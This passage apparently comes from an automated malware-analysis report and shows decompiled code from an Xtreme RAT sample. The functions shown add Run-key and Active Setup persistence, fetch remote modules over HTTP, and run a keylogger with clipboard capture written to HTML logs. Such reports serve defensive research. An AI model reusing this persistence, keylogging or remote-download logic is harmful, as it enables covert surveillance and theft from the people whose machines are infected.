                  				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
                  				E10003C28( &_v8);
                  				_push(_t187);
                  				_push(0x1000a113);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t188 + 0xc;
                  				if(_v1880 != 0) {
                  					_t193 = _v1512 - 1;
                  					if(_v1512 == 1) {
                  						E100038E0( &_v5032, 0x3d,  &_v1878);
                  						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t185, _t193, 2, _v8);
                  					}
                  					_t194 = _v1511 - 1;
                  					if(_v1511 == 1) {
                  						E100038E0( &_v5036, 0x3d,  &_v1756);
                  						E1000577C(0x80000001, _t123, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t185, _t194, 2, _v8);
                  					}
                  					_t195 = _v1510 - 1;
                  					if(_v1510 == 1) {
                  						E100038E0( &_v5044, 0x3d,  &_v1634);
                  						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t195);
                  						E100059E8(0x80000001, _t123, _v5040, _t195);
                  						E10003988( &_v5048, L" restart", _v8, _t195);
                  						E100038E0( &_v5056, 0x3d,  &_v1634);
                  						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t195);
                  						E1000577C(0x80000002, _t123, L"StubPath", _v5052, _t185, _t195, 2, _v5048);
                  					}
                  					_t196 = _v1509 - 1;
                  					if(_t196 == 0) {
                  						E100034B0( &_v5060, 0x3d,  &_v1264);
                  						E1000362C(_v5060, "%SERVER%");
                  						if(_t196 == 0) {
                  							E10005240(_v8, _t123, 0x3d,  &_v5184);
                  							_t185 =  &_v5184;
                  							memcpy( &_v1264,  &_v5184, 0x1e << 2);
                  							asm("movsw");
                  						}
                  						E100038E0( &_v16, 0x3d,  &_v1508);
                  						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
                  						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
                  						_t87 = E10005A94(_v12, _t123, _t83);
                  						E100038E0( &_v5188, 0x3d,  &_v1264);
                  						E100038E0( &_v5192, 0x3d,  &_v1386);
                  						E1000577C(_t87, _t87, _v5192, _v16, _t185, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
                  					}
                  				}
                  				_pop(_t151);
                  				 *[fs:eax] = _t151;
                  				_push(E1000A11A);
                  				E10003788( &_v5192, 2);
                  				E100032CC( &_v5060);
                  				E10003788( &_v5056, 7);
                  				return E10003788( &_v16, 3);
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
                  • API String ID: 0-2142522223
                  • Opcode ID: 6a3a9802c04267f5677fb71fa8e26ddd48aad684d5027258f0195948b13e5c11
                  • Instruction ID: 51db14d9a78096dfca6e0b2c0cac839b55e5a7d9a5be764b8c5632986f08cd1f
                  • Opcode Fuzzy Hash: 6a3a9802c04267f5677fb71fa8e26ddd48aad684d5027258f0195948b13e5c11
                  • Instruction Fuzzy Hash: B5619338A0415D9BEB15D750C841BDEB3BEEF45380F8081E6A908A7249DB75AF85CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 66%
                  			E1000A54F(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                  				char _v4;
                  				void* _v8;
                  				char _v9;
                  				intOrPtr _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v2516;
                  				intOrPtr _v2520;
                  				char _v4960;
                  				char _v5040;
                  				void _v5044;
                  				char _v5048;
                  				char _v5052;
                  				intOrPtr _v5056;
                  				char _v5060;
                  				char _v5064;
                  				char _v5068;
                  				char _v5072;
                  				char _v5076;
                  				char _v5080;
                  				char _v5084;
                  				void* _t107;
                  				void* _t146;
                  				void* _t150;
                  				intOrPtr _t160;
                  				void* _t180;
                  				void* _t185;
                  				void* _t207;
                  				void* _t225;
                  				char* _t226;
                  				intOrPtr _t241;
                  				intOrPtr _t245;
                  				char _t246;
                  				intOrPtr _t249;
                  				void* _t259;
                  				char* _t260;
                  				char _t273;
                  				void* _t274;
                  				char* _t275;
                  				intOrPtr _t288;
                  				intOrPtr* _t293;
                  				signed int _t294;
                  				void* _t295;
                  				void* _t296;
                  
                  				_t292 = __esi;
                  				_t246 = __edx;
                  				_t102 = __eax;
                  				_push(__eax);
                  				asm("insb");
                  				if(__eflags == 0) {
                  					_t294 =  *(__esi - 0x73) * 0x8b550040;
                  					_push(_t294);
                  					_t295 = _t296;
                  					_t241 = 0x27b;
                  					do {
                  						_push(0);
                  						_push(0);
                  						_t241 = _t241 - 1;
                  					} while (_t241 != 0);
                  					_t2 =  &_v8;
                  					 *_t2 = _t241;
                  					_push(__ebx);
                  					_push(__esi);
                  					_t292 = __eax;
                  					_push( *_t2);
                  					memcpy( &_v5044, __eax, 0x4e4 << 2);
                  					_pop(_t245);
                  					_v12 = _t245;
                  					_v8 = _t246;
                  					E10003C28( &_v8);
                  					_push(_t295);
                  					_push(0x1000a98b);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t296 + 0xc;
                  					E10003770(_v12);
                  					_push("URLMON.DLL");
                  					L10004EE8();
                  					_push("shell32.dll");
                  					L10004EE8();
                  					_t102 =  &_v24;
                  				}
                  				E100037D0(_t102, L"XTREME");
                  				_v9 = 0;
                  				_t225 = E1000390C(_v4);
                  				_t107 = E10005CA4(_t225);
                  				_t302 = _t107;
                  				if(_t107 == 0) {
                  					L10:
                  					_t288 = 0x14;
                  					_t226 =  &_v4960;
                  					_t293 =  &_v5040;
                  					do {
                  						E100034B0( &_v5048, 0x3d, _t226);
                  						__eflags = _v5048;
                  						if(_v5048 != 0) {
                  							__eflags =  *_t293;
                  							if( *_t293 > 0) {
                  								_push("http://");
                  								E100034B0( &_v5060, 0x3d, _t226);
                  								_push(_v5060);
                  								_push(0x1000aa2c);
                  								E100035A0();
                  								_t255 = _v5056;
                  								E100038FC( &_v5052, _v5056);
                  								_push(_v5052);
                  								asm("cdq");
                  								E10005CCC( &_v5064, 0x3d, _v5056,  *_t293, _t255);
                  								_push(_v5064);
                  								_push(0x1000aa34);
                  								E10005CCC( &_v5068, 0x3d, _t255, _v2520, _v2516);
                  								_push(_v5068);
                  								_push(L".functions");
                  								E100039EC();
                  								E10003898( &_v5072, E1000390C(_v4));
                  								_push(_v5072);
                  								E10003898( &_v5076, E1000390C(_v16));
                  								_pop(_t259);
                  								_t146 = E10005F88(_v5076, _t226, _t259);
                  								__eflags = _t146 - 1;
                  								if(_t146 != 1) {
                  									_push(E1000390C(_v4));
                  									L10004E30();
                  								} else {
                  									_t150 = E1000390C(_v4);
                  									_t260 =  &_v24;
                  									_v32 = E10005E30(_t150, _t260);
                  									_v28 = _t260;
                  									__eflags = _v28;
                  									if(__eflags != 0) {
                  										if(__eflags > 0) {
                  											goto L18;
                  										}
                  									} else {
                  										__eflags = _v32;
                  										if(_v32 > 0) {
                  											L18:
                  											E10003BE4( &_v16, E10003FD4(_v32, _v28, 2, 0));
                  											E100050D0(E1000390C(_v16), _v24);
                  											_t160 = E10003B94(L"STARTSERVERBUFFER", _v16);
                  											__eflags = _t160;
                  											if(_t160 > 0) {
                  												__eflags = E10003B94(L"ENDSERVERBUFFER", _v16);
                  												if(__eflags > 0) {
                  													E10003B04( &_v16, 0x11, 1, __eflags);
                  													E10003B04( &_v16, 0xf, E1000391C(_v16) - 0xf, __eflags);
                  													E10006234(_v16, _t226,  &_v5080, _v20, _t293, __eflags);
                  													E100037AC(_v8, _v5080);
                  													_push(L"STARTSERVERBUFFER");
                  													_push( *_v8);
                  													_push(L"ENDSERVERBUFFER");
                  													E100039EC();
                  													E10006234(_v16, _t226,  &_v5084, _v20, _t293, __eflags);
                  													_t273 = _v5084;
                  													E100037D0( &_v16, _t273);
                  													_t180 = E1000391C(_v16);
                  													asm("cdq");
                  													_push(_t273);
                  													_push(_t180 + _t180);
                  													_push(E1000390C(_v16));
                  													_t185 = E1000390C(_v4);
                  													_pop(_t274);
                  													E10005EB4(_t185, _t274);
                  													E10005F1C(_v4, _t226,  &_v5084, _t293);
                  													_v9 = 1;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  						_t293 = _t293 + 4;
                  						_t226 = _t226 + 0x7a;
                  						_t288 = _t288 - 1;
                  						__eflags = _t288;
                  					} while (_t288 != 0);
                  				} else {
                  					_push(0x80);
                  					_push(_t225);
                  					L10004F30();
                  					_t275 =  &_v24;
                  					_v32 = E10005E30(_t225, _t275);
                  					_v28 = _t275;
                  					E10003BE4( &_v16, E10003FD4(_v32, _v28, 2, 0));
                  					E100050D0(E1000390C(_v16), _v24);
                  					E10006234(_v16, _t225,  &_v5044, _v20, _t292, _t302);
                  					E100037D0( &_v16, _v5044);
                  					if(E10003B94(L"STARTSERVERBUFFER", _v16) <= 0) {
                  						L9:
                  						_push(E1000390C(_v4));
                  						L10004E30();
                  						goto L10;
                  					} else {
                  						_t207 = E10003B94(L"ENDSERVERBUFFER", _v16);
                  						_t304 = _t207;
                  						if(_t207 <= 0) {
                  							goto L9;
                  						} else {
                  							E10005F1C(_v4, _t225,  &_v5044, _t292);
                  							E10003B04( &_v16, 0x11, 1, _t304);
                  							E10003B04( &_v16, 0xf, E1000391C(_v16) - 0xf, _t304);
                  							E100037AC(_v8, _v16);
                  							_v9 = 1;
                  						}
                  					}
                  				}
                  				_pop(_t249);
                  				 *[fs:eax] = _t249;
                  				_push(E1000A992);
                  				E10003788( &_v5084, 6);
                  				E100032F0( &_v5060, 2);
                  				E10003770( &_v5052);
                  				E100032CC( &_v5048);
                  				E10003770( &_v5044);
                  				E10003788( &_v20, 2);
                  				return E10003770( &_v4);
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ENDSERVERBUFFER$STARTSERVERBUFFER$URLMON.DLL$XTREME$shell32.dll
                  • API String ID: 0-2417524110
                  • Opcode ID: 713050decec376a8e5de2e79cbc70c6421a00f6f369ebb3c5e82f8a6782ac755
                  • Instruction ID: 30b3ef76a2a80ae0936852672a2bbee531ad642fb2a80bd77bca9c30e5cd02f7
                  • Opcode Fuzzy Hash: 713050decec376a8e5de2e79cbc70c6421a00f6f369ebb3c5e82f8a6782ac755
                  • Instruction Fuzzy Hash: 7F418D78A141199BEB11DBA4CC82BEFB3B9FF44380F508165F504A728ADB34BE418B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
• String ID: &$>$<$"$<br />
                  • API String ID: 0-2730314969
                  • Opcode ID: 0cd1edd9943d5066e4ed9cbb4ed191d6f01f5bec750c3f69ea3f40f0141da2ec
                  • Instruction ID: c2b4ba650b709cafa3e4efc2b6e91a51004f46039d2a3ae5a547a61f7c415082
                  • Opcode Fuzzy Hash: 0cd1edd9943d5066e4ed9cbb4ed191d6f01f5bec750c3f69ea3f40f0141da2ec
                  • Instruction Fuzzy Hash: 57314579A04189AFEF05DB94CC819DF77FDFB88680F509061F180A7209DA34AF028B65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 44%
                  			E10008560(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				intOrPtr _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				char _v36;
                  				char _v40;
                  				intOrPtr _v44;
                  				char _v300;
                  				intOrPtr _v304;
                  				char _v308;
                  				char _v312;
                  				char _v316;
                  				char _v320;
                  				char _v324;
                  				char _v328;
                  				char _v332;
                  				char _v336;
                  				char _v340;
                  				char _v344;
                  				char _v348;
                  				char _v352;
                  				char _v356;
                  				char _v360;
                  				char _v364;
                  				char _v368;
                  				char _v372;
                  				char _v376;
                  				char _v380;
                  				char _v384;
                  				intOrPtr* _t101;
                  				intOrPtr _t102;
                  				intOrPtr _t103;
                  				intOrPtr _t111;
                  				intOrPtr _t112;
                  				void* _t121;
                  				char _t133;
                  				intOrPtr _t149;
                  				intOrPtr _t151;
                  				intOrPtr _t152;
                  				intOrPtr _t156;
                  				char _t170;
                  				intOrPtr _t179;
                  				intOrPtr _t180;
                  				intOrPtr _t181;
                  				intOrPtr _t189;
                  				intOrPtr _t190;
                  				intOrPtr _t191;
                  				intOrPtr _t208;
                  				intOrPtr _t227;
                  				char _t235;
                  				intOrPtr _t244;
                  				intOrPtr _t245;
                  				void* _t246;
                  				void* _t247;
                  				intOrPtr _t250;
                  				intOrPtr _t261;
                  				intOrPtr _t268;
                  				intOrPtr _t280;
                  				intOrPtr _t281;
                  				intOrPtr _t282;
                  				intOrPtr _t307;
                  				intOrPtr _t309;
                  				intOrPtr _t310;
                  				void* _t314;
                  
                  				_t306 = __esi;
                  				_t305 = __edi;
                  				_t101 = __eax +  *__eax;
                  				 *_t101 =  *_t101 + _t101;
                  				 *_t101 =  *_t101 + _t101;
                  				_t309 = _t310;
                  				_t247 = 0x2f;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t247 = _t247 - 1;
                  				} while (_t247 != 0);
                  				_push(_t247);
                  				_push(__ebx);
                  				_push(__esi);
                  				_t244 = _a16;
                  				_t102 = _a8;
                  				_push(_t309);
                  				_push(0x10008ba5);
                  				_push( *[fs:edx]);
                  				 *[fs:edx] = _t310;
                  				_t314 = _t102 -  *0x1000f68c; // 0xc1b9
                  				if(_t314 != 0) {
                  					__eflags = _t102 -  *0x1000f690; // 0xc1ba
                  					if(__eflags != 0) {
                  						__eflags = _t102 -  *0x1000f694; // 0xc1bc
                  						if(__eflags != 0) {
                  							__eflags = _t102 -  *0x1000f698; // 0x0
                  							if(__eflags != 0) {
                  								__eflags = _t102 -  *0x1000f69c; // 0xc1bd
                  								if(__eflags != 0) {
                  									__eflags = _t102 - 0x308;
                  									if(_t102 != 0x308) {
                  										__eflags = _t102 -  *0x1000f6a0; // 0xc1be
                  										if(__eflags != 0) {
                  											_push(_t244);
                  											_push(_a12);
                  											_push(_t102);
                  											_t103 = _a4;
                  											_push(_t103);
                  											L10004FE0();
                  											_v8 = _t103;
                  										} else {
                  											__eflags =  *0x1000e0b8;
                  											if( *0x1000e0b8 != 0) {
                  												_push(0);
                  												_push(0);
                  												_push(0);
                  												_t111 =  *0x1000e0b8; // 0x0
                  												_push(_t111);
                  												L10004F38();
                  												_t112 =  *0x1000e0b8; // 0x0
                  												_push(_t112);
                  												L10004F18();
                  												 *0x1000f6c4 = 0;
                  												 *0x1000f6c8 = 0;
                  												__eflags =  *0x1000f6c1 - 1;
                  												if(__eflags == 0) {
                  													E10006710( &_v380, _t247, 0,  *0x1000f6c4,  *0x1000f6c8);
                  													_t250 =  *0x1000f6b4; // 0x0
                  													E10003988( &_v384, _t250, L"SOFTWARE\\", __eflags);
                  													E1000577C(0x80000001, _t244, L"LastSize", _v384, __esi, __eflags, 2, _v380);
                  												}
                  											}
                  										}
                  									} else {
                  										__eflags =  *0x1000f6d4;
                  										if( *0x1000f6d4 != 0) {
                  											_t121 = E100069DC(0, _t244,  &_v12, __esi);
                  											__eflags = _t121 - 1;
                  											if(_t121 == 1) {
                  												_t268 =  *0x1000e0b4; // 0x0
                  												E10003A34(_v12, _t268);
                  												if(__eflags != 0) {
                  													E100037AC(0x1000e0b4, _v12);
                  													E10008270(L"\r\n\r\n", _t244,  &_v352, __edi, __esi);
                  													_push(_v352);
                  													_push(L"<FONT COLOR=\"red\">[Clipboard");
                  													_push(L" --- ");
                  													E10006B14(0x2f, _t244, 0x3a, 0x20, __edi, _t306,  &_v356);
                  													_push(_v356);
                  													_push(L"]</font>");
                  													E10008270(0x10008bcc, _t244,  &_v360, __edi, _t306);
                  													_push(_v360);
                  													_t133 =  *0x1000e0b4; // 0x0
                  													E10008270(_t133, _t244,  &_v364, _t305, _t306);
                  													_push(_v364);
                  													E10008270(0x10008bcc, _t244,  &_v368, _t305, _t306);
                  													_push(_v368);
                  													_push(L"<FONT COLOR=\"red\">[Clipboard End]</font>");
                  													E10008270(L"\r\n\r\n", _t244,  &_v372, _t305, _t306);
                  													_push(_v372);
                  													E100039EC();
                  													__eflags =  *0x1000e0b8 - 0xffffffff;
                  													if(__eflags != 0) {
                  														E100061F8(_v12,  &_v376, __eflags);
                  														E100037D0( &_v12, _v376);
                  														_push(0);
                  														_push( &_v32);
                  														_t149 = E1000391C(_v12) + _t148;
                  														__eflags = _t149;
                  														_push(_t149);
                  														_push(_v12);
                  														_t151 =  *0x1000e0b8; // 0x0
                  														_push(_t151);
                  														L10004FA0();
                  													}
                  													E100037AC(0x1000f6d0, L"qualquercoisarsrsr");
                  												}
                  											}
                  										}
                  									}
                  								} else {
                  									__eflags =  *0x1000f6d4;
                  									if( *0x1000f6d4 != 0) {
                  										_t152 =  *0x1000f69c; // 0xc1bd
                  										_v8 = _t152 + 1;
                  									}
                  								}
                  							} else {
                  								__eflags =  *0x1000f6d4;
                  								if( *0x1000f6d4 != 0) {
                  									_t102 =  *0x1000f6d4; // 0x0
                  									_push(_t102);
                  									L100050B8();
                  								}
                  								_push(0);
                  								_push(0);
                  								L10004EA0();
                  								_push(_t102);
                  								_push(E10008040);
                  								_push(0xd);
                  								L100050A0();
                  								 *0x1000f6d4 = E10008040;
                  							}
                  						} else {
                  							__eflags =  *0x1000f6d4;
                  							if( *0x1000f6d4 != 0) {
                  								_t156 =  *0x1000f6d4; // 0x0
                  								_push(_t156);
                  								L100050B8();
                  							}
                  							 *0x1000f6d4 = 0;
                  						}
                  					} else {
                  						E10003770( &_v12);
                  						__eflags =  *0x1000f6d4;
                  						if( *0x1000f6d4 != 0) {
                  							_t191 =  *0x1000f6d4; // 0x0
                  							_push(_t191);
                  							L100050B8();
                  						}
                  						__eflags =  *0x1000e0b8 - 0xffffffff;
                  						if(__eflags != 0) {
                  							_push(0);
                  							_push(0);
                  							_push(0);
                  							_t180 =  *0x1000e0b8; // 0x0
                  							_push(_t180);
                  							L10004F38();
                  							_push(0);
                  							_t181 =  *0x1000e0b8; // 0x0
                  							_push(_t181);
                  							L10004E80();
                  							__eflags = 0;
                  							_v28 = _t181;
                  							_v24 = 0;
                  							E10003BE4( &_v12, E10003FD4(_v28, _v24, 2, 0));
                  							_push(0);
                  							_push( &_v32);
                  							_push(_v28);
                  							_push(_v12);
                  							_t189 =  *0x1000e0b8; // 0x0
                  							_push(_t189);
                  							L10004F00();
                  							_push(2);
                  							_push(0);
                  							_push(0);
                  							_t190 =  *0x1000e0b8; // 0x0
                  							_push(_t190);
                  							L10004F38();
                  						}
                  						_push(0x80);
                  						_t280 =  *0x1000f684; // 0x0
                  						E10003988( &_v336, L"temp", _t280, __eflags);
                  						_push(E1000390C(_v336));
                  						L10004F30();
                  						_t281 =  *0x1000f684; // 0x0
                  						E10003988( &_v340, L"temp", _t281, __eflags);
                  						_push(E1000390C(_v340));
                  						L10004E30();
                  						_push(0);
                  						_push(0);
                  						_push(2);
                  						_push(0);
                  						_push(0);
                  						_push(0x40000000);
                  						_t282 =  *0x1000f684; // 0x0
                  						E10003988( &_v344, L"temp", _t282, __eflags);
                  						_t170 = E1000390C(_v344);
                  						_push(_t170);
                  						L10004DE0();
                  						_t245 = _t170;
                  						__eflags = _t245 - 0xffffffff;
                  						if(__eflags != 0) {
                  							E100061F8(_v12,  &_v348, __eflags);
                  							E100037D0( &_v12, _v348);
                  							_push(0);
                  							_push( &_v32);
                  							_t179 = E1000391C(_v12) + _t178;
                  							__eflags = _t179;
                  							_push(_t179);
                  							_t170 = _v12;
                  							_push(_t170);
                  							_push(_t245);
                  							L10004FA0();
                  						}
                  						_push(_t245);
                  						L10004DC0();
                  						_push(0);
                  						_push(0);
                  						L10004EA0();
                  						_push(_t170);
                  						_push(E10008040);
                  						_push(0xd);
                  						L100050A0();
                  						 *0x1000f6d4 = E10008040;
                  					}
                  					L43:
                  					_pop(_t261);
                  					 *[fs:eax] = _t261;
                  					_push(E10008BAC);
                  					E10003788( &_v384, 0x13);
                  					E10003788( &_v40, 2);
                  					return E10003788( &_v16, 2);
                  				}
                  				_t307 = _t244;
                  				E100050D0( &_v308, _t307);
                  				_push(0x8000);
                  				_push(0);
                  				_push(_t307);
                  				L10004F80();
                  				E10006E78(_t244, __edi, _t307,  &_v36, _v308, _v304,  &_v300, _v44);
                  				E100037D0( &_v40, _v36);
                  				E10006974( &_v16);
                  				_t246 = E10008438(_v16, _t244, __edi, _t307);
                  				_t208 =  *0x1000f6d0; // 0x0
                  				E10003A34(_t208, _v16);
                  				if(_t314 == 0) {
                  					L7:
                  					E10003770( &_v16);
                  					L8:
                  					E10003A34(_v40, 0);
                  					if(0 != 0) {
                  						_t317 = _t246 - 1;
                  						if(_t246 == 1) {
                  							E10008270(_v36, _t246,  &_v328, _t305, _t307);
                  							E10003988( &_v12, _v328, _v16, _t317);
                  							_t318 =  *0x1000e0b8 - 0xffffffff;
                  							if( *0x1000e0b8 != 0xffffffff) {
                  								E100061F8(_v12,  &_v332, _t318);
                  								E100037D0( &_v12, _v332);
                  								_push(0);
                  								_push( &_v32);
                  								_push(E1000391C(_v12) + _t224);
                  								_push(_v12);
                  								_t227 =  *0x1000e0b8; // 0x0
                  								_push(_t227);
                  								L10004FA0();
                  							}
                  						}
                  					}
                  					goto L43;
                  				}
                  				E10003A34(_v40, 0);
                  				if(0 == 0) {
                  					goto L7;
                  				} else {
                  					E100037AC(0x1000f6d0, _v16);
                  					_push(L"\r\n\r\n");
                  					_push(_v16);
                  					_push(0x10008bcc);
                  					_push(_v36);
                  					E100039EC();
                  					E10008270(L"\r\n\r\n", _t246,  &_v312, __edi, _t307);
                  					_push(_v312);
                  					_push(L"<FONT COLOR=\"blue\">[");
                  					_t235 =  *0x1000f6d0; // 0x0
                  					E10008270(_t235, _t246,  &_v316, _t305, _t307);
                  					_push(_v316);
                  					_push(0x10008c08);
                  					_push(L" --- ");
                  					E10006B14(0x2f, _t246, 0x3a, 0x20, _t305, _t307,  &_v320);
                  					_push(_v320);
                  					_push(L"</font>");
                  					E10008270(0x10008bcc, _t246,  &_v324, _t305, _t307);
                  					_push(_v324);
                  					E100039EC();
                  					goto L8;
                  				}
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $ --- $</font>$<FONT COLOR="blue">[
                  • API String ID: 0-341333612
                  • Opcode ID: 844369069b05dfd62b440b7fafa7b9f06d8a9886853feb290a734d0b2ba6acd8
                  • Instruction ID: 82ed3cb906cd8235e36a84cac39b9343783464e2b4201940a396f7c820685ddb
                  • Opcode Fuzzy Hash: 844369069b05dfd62b440b7fafa7b9f06d8a9886853feb290a734d0b2ba6acd8
                  • Instruction Fuzzy Hash: 6F513A78A00119AFEB11DB94CC81FDEB7B9FB48380F5084A1F548A7269DB31BF458B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 51%
                  			E100093E4(void* __ebx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v92;
                  				intOrPtr _t13;
                  				intOrPtr _t17;
                  				intOrPtr _t19;
                  				intOrPtr _t20;
                  				intOrPtr _t24;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr _t28;
                  				intOrPtr _t30;
                  				intOrPtr _t34;
                  				intOrPtr _t37;
                  				char* _t38;
                  				void* _t39;
                  				void* _t53;
                  				intOrPtr _t58;
                  				char* _t61;
                  				intOrPtr _t62;
                  				char* _t66;
                  				void* _t67;
                  				void* _t71;
                  				void* _t72;
                  				intOrPtr* _t75;
                  
                  				_t72 = __esi;
                  				_t71 = __edi;
                  				_t53 = __ebx;
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(_t75);
                  				_push(0x100095de);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t75;
                  				E10008D4C(0);
                  				E100037D0( &_v8, L"XtremeKeylogger");
                  				if( *0x1000f688 == 0) {
                  					_t54 = E1000390C(_v8);
                  					 *0x1000f688 = E10006510(_t50, 1, E10008568);
                  				}
                  				_push(0);
                  				_t13 =  *0x1000f688; // 0x0
                  				_push(E1000662C(_t13));
                  				L100050A8();
                  				_t61 = L"qualquercoisarsrsr";
                  				E100037AC(0x1000f6d0, _t61);
                  				_push(0x80);
                  				_t17 =  *0x1000f684; // 0x0
                  				_push(E1000390C(_t17));
                  				L10004F30();
                  				_push(0);
                  				_push(0);
                  				_push(4);
                  				_push(0);
                  				_push(3);
                  				_push(0xc0000000);
                  				_t19 =  *0x1000f684; // 0x0
                  				_t20 = E1000390C(_t19);
                  				_push(_t20);
                  				L10004DE0();
                  				 *0x1000e0b8 = _t20;
                  				if( *0x1000e0b8 != 0xffffffff) {
                  					_t78 =  *0x1000f6c1 - 1;
                  					if( *0x1000f6c1 == 1) {
                  						 *0x1000f6c4 = E10006788(_t53, _t71, _t72, _t78);
                  						 *0x1000f6c8 = _t61;
                  						_push(0);
                  						_t37 =  *0x1000e0b8; // 0x0
                  						_push(_t37);
                  						L10004E80();
                  						_push(0);
                  						_push(_t37);
                  						_t38 =  *0x1000f6c4; // 0x0
                  						_t66 =  *0x1000f6c8; // 0x0
                  						_t39 = E10003FB0(_t38, _t66, 2, 0);
                  						if(_t66 != _v92) {
                  							_pop(_t67);
                  							if(__eflags > 0) {
                  								goto L8;
                  							}
                  						} else {
                  							_t80 = _t39 -  *_t75;
                  							_pop(_t67);
                  							if(_t39 >  *_t75) {
                  								L8:
                  								 *0x1000f6c4 = 0;
                  								 *0x1000f6c8 = 0;
                  							}
                  						}
                  						E10006710( &_v12, _t54, _t67,  *0x1000f6c4,  *0x1000f6c8);
                  						_t58 =  *0x1000f6b4; // 0x0
                  						E10003988( &_v16, _t58, L"SOFTWARE\\", _t80);
                  						E1000577C(0x80000001, _t53, L"LastSize", _v16, _t72, _t80, 2, _v12);
                  					}
                  					_push(7);
                  					_t24 =  *0x1000f684; // 0x0
                  					_push(E1000390C(_t24));
                  					L10004F30();
                  					_push(2);
                  					_push(0);
                  					_push(0);
                  					_t26 =  *0x1000e0b8; // 0x0
                  					_push(_t26);
                  					L10004F38();
                  					_push(0);
                  					_push(0);
                  					_t27 =  *0x1000f698; // 0x0
                  					_push(_t27);
                  					_t28 =  *0x1000f688; // 0x0
                  					_push(E1000662C(_t28));
                  					L10005088();
                  					_t30 =  *0x1000f688; // 0x0
                  					_push(E1000662C(_t30));
                  					L10005090();
                  					if( *0x1000f6c1 == 1) {
                  						if( *0x1000e0b0 != 0) {
                  							_t34 =  *0x1000e0b0; // 0x0
                  							E10006768(_t34);
                  						}
                  						 *0x1000e0b0 = E10006744(E10009204, 0, 0);
                  					}
                  				}
                  				_pop(_t62);
                  				 *[fs:eax] = _t62;
                  				_push(E100095E5);
                  				return E10003788( &_v16, 3);
                   			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: LastSize$SOFTWARE\$XtremeKeylogger$qualquercoisarsrsr
                  • API String ID: 0-193067991
                  • Opcode ID: b8b35e645ddaf236c2101e74a19ca3d57dbe3ac871cbe1f58d3791964739a7a7
                  • Instruction ID: e10228e688af51e092dac2c6f3dee7a218e45a64ed0b3a8379d93de067ea2b0a
                  • Opcode Fuzzy Hash: b8b35e645ddaf236c2101e74a19ca3d57dbe3ac871cbe1f58d3791964739a7a7
                  • Instruction Fuzzy Hash: 86415E78604251AFF711EB70CC92F6E37A9E7483C0F518029F144AB6FECEB6A8419751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E10009204() {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				intOrPtr _t26;
                  				intOrPtr _t28;
                  				intOrPtr _t38;
                  				void* _t39;
                  				void* _t51;
                  				intOrPtr _t55;
                  				void* _t56;
                  				intOrPtr _t57;
                  				intOrPtr _t61;
                  				void* _t63;
                  				intOrPtr _t71;
                  
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0x1000937d);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t71;
                  				while(1) {
                  					_t51 = 0;
                  					goto L2;
                  					L2:
                  					_push(0x3e8);
                  					L10004F58();
                  					_t51 = _t51 + 1;
                  					if(_t51 < ( *0x1000f6bc + 1 + ( *0x1000f6bc + 1) * 4) * 0x3c) {
                  						goto L2;
                  					} else {
                  						_t75 =  *0x1000e0b8;
                  						if( *0x1000e0b8 != 0) {
                  							E10006B14(0x2e, _t51, 0x2e, 0x2d, 0x1000e0b8, 0x1000f6bc,  &_v8);
                  							E10003928( &_v8, 0x2e, L".html", _t75);
                  							_push(E1000390C(_v8));
                  							_t26 =  *0x1000f6ac; // 0x0
